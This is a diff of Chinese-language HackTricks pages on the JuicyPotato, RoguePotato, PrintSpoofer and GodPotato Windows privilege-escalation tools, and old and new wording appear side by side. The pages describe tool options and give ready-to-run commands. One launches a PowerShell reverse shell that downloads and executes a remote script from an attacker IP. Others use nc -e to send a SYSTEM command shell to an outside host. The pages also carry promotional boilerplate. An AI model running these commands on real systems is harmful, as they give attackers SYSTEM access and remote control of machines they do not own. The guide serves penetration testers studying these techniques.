### 详细信息 <a href="#juicy-details" id="juicy-details"></a>
### Juicy细节 <a href="#juicy-details" id="juicy-details"></a>
JuicyPotato允许您
* **目标CLSID** _选择任何您想要的CLSID。_ [_在此_](http://ohpe.it/juicy-potato/CLSID/) _您可以找到按操作系统组织的列表。_
* **目标CLSID** _选择任何您想要的CLSID。_ [_这里_](http://ohpe.it/juicy-potato/CLSID/) _您可以找到按操作系统组织的列表。_
* **COM监听端口** _定义您喜欢的COM监听端口而不是已编组的硬编码6666_
* **COM监听IP地址** _将服务器绑定到任何IP_
* **进程创建模式** _根据模拟用户的权限您可以选择_
* `CreateProcessWithToken`(需要`SeImpersonate`
* `CreateProcessAsUser`(需要`SeAssignPrimaryToken`
* `both`
* `两者`
* **要启动的进程** _如果利用成功启动可执行文件或脚本_
* **进程参数** _自定义启动进程参数_
* **RPC服务器地址** _用于隐蔽的方法您可以对外部RPC服务器进行身份验证_
* **RPC服务器端口** _如果要对外部服务器进行身份验证且防火墙阻止端口`135`则很有用…_
* **测试模式** _主要用于测试目的即测试CLSID。 它创建DCOM并打印令牌的用户。请参见_ [_此处进行测试_](http://ohpe.it/juicy-potato/Test/)
* **RPC服务器地址** _用于隐蔽操作您可以对外部RPC服务器进行身份验证_
* **RPC服务器端口** _如果您想要对外部服务器进行身份验证且防火墙阻止端口`135`则很有用…_
* **测试模式** _主要用于测试目的即测试CLSID。它创建DCOM并打印令牌的用户。查看_ [_这里进行测试_](http://ohpe.it/juicy-potato/Test/)
### 用法 <a href="#usage" id="usage"></a>
```
T:\>JuicyPotato.exe
@ -120,7 +120,7 @@ Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
c:\Users\Public>
```
### Powershell 反向 Shell
### Powershell 反向 shell
```
.\jp.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.14.3:8080/ipst.ps1')" -t *
```
@ -128,9 +128,9 @@ c:\Users\Public>
![](<../../.gitbook/assets/image (297).png>)
## CLSID问题
## CLSID 问题
通常情况下JuicyPotato使用的默认CLSID**无法正常工作**,导致利用失败。通常需要多次尝试才能找到**有效的CLSID**。要获取特定操作系统尝试的CLSID列表您应该访问此页面
通常情况下JuicyPotato使用的默认CLSID**无法正常工作**,导致利用失败。通常需要多次尝试才能找到一个**有效的CLSID**。要获取针对特定操作系统尝试的CLSID列表您应该访问此页面
{% embed url="https://ohpe.it/juicy-potato/CLSID/" %}
@ -142,17 +142,17 @@ c:\Users\Public>
然后下载[test\_clsid.bat](https://github.com/ohpe/juicy-potato/blob/master/Test/test\_clsid.bat)(更改路径到CLSID列表和juicypotato可执行文件)并执行它。它将开始尝试每个CLSID**当端口号更改时表示CLSID有效**。
**使用参数-c检查**有效的CLSID
**使用参数 -c 检查**有效的CLSID
## 参考资料
* [https://github.com/ohpe/juicy-potato/blob/master/README.md](https://github.com/ohpe/juicy-potato/blob/master/README.md)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**推动的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
@ -162,12 +162,12 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
* 您在**网络安全公司**工作吗? 您想看到您的**公司在HackTricks中做广告**吗? 或者您想访问**PEASS的最新版本或下载PDF格式的HackTricks** 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 您在**网络安全公司**工作吗? 想要在HackTricks中看到您的**公司广告** 或者想要访问**PEASS的最新版本或下载PDF格式的HackTricks** 请查看[**订阅计划**](https://github.com/sponsors/carlospolop)
* 发现我们的独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品[**The PEASS Family**](https://opensea.io/collection/the-peass-family)
* 获取[**官方PEASS和HackTricks周边产品**](https://peass.creator-spring.com)
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) [**Discord群**](https://discord.gg/hRep4RUj7f)或[**电报群**](https://t.me/peass)或在**Twitter**上关注我🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**hacktricks repo**](https://github.com/carlospolop/hacktricks)和[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud)提交PR来分享您的黑客技巧。
* **加入**[**💬**](https://emojipedia.org/speech-balloon/) **Discord群组**](https://discord.gg/hRep4RUj7f) 或**电报群组**](https://t.me/peass) 或在**Twitter**上关注我 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**hacktricks repo**](https://github.com/carlospolop/hacktricks) ****[**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **提交PR来分享您的黑客技巧。**
</details>

28
windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
View file

@ -2,25 +2,25 @@
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想看到您的**公司在HackTricks中广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家[NFTs](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供**免费**功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
[**WhiteIntel**](https://whiteintel.io)是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel的主要目标是打击由于窃取信息恶意软件导致的账户劫持和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
@ -29,7 +29,7 @@ WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫
---
{% hint style="warning" %}
**JuicyPotato在Windows Server 2019和Windows 10版本1809及更高版本上无法使用**。然而[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)****[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)****[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)****[**GodPotato**](https://github.com/BeichenDream/GodPotato) 可以用于**利用相同权限并获得`NT AUTHORITY\SYSTEM`**级别访问权限。这篇[博文](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)深入介绍了`PrintSpoofer`工具该工具可用于在JuicyPotato不再适用的Windows 10和Server 2019主机上滥用模拟权限。
**JuicyPotato在Windows Server 2019和Windows 10版本1809及更高版本上无法使用**。但是[**PrintSpoofer**](https://github.com/itm4n/PrintSpoofer)****[**RoguePotato**](https://github.com/antonioCoco/RoguePotato)****[**SharpEfsPotato**](https://github.com/bugch3ck/SharpEfsPotato)****[**GodPotato**](https://github.com/BeichenDream/GodPotato)可以用于**获取相同的权限并获得`NT AUTHORITY\SYSTEM`**级别访问权限。这篇[博文](https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/)深入介绍了`PrintSpoofer`工具该工具可用于在JuicyPotato不再适用于Windows 10和Server 2019主机的情况下滥用模拟权限。
{% endhint %}
## 快速演示
@ -51,7 +51,7 @@ NULL
```
### RoguePotato
{% 代码 溢出="wrap" %}
{% 代码 溢出="换行" %}
```bash
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
@ -92,11 +92,11 @@ GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"
* [https://github.com/bugch3ck/SharpEfsPotato](https://github.com/bugch3ck/SharpEfsPotato)
* [https://github.com/BeichenDream/GodPotato](https://github.com/BeichenDream/GodPotato)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**。
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**侵害**。
WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫持和勒索软件攻击。
@ -112,8 +112,8 @@ WhiteIntel的主要目标是打击由窃取信息恶意软件导致的账户劫
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**上关注**我们。
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>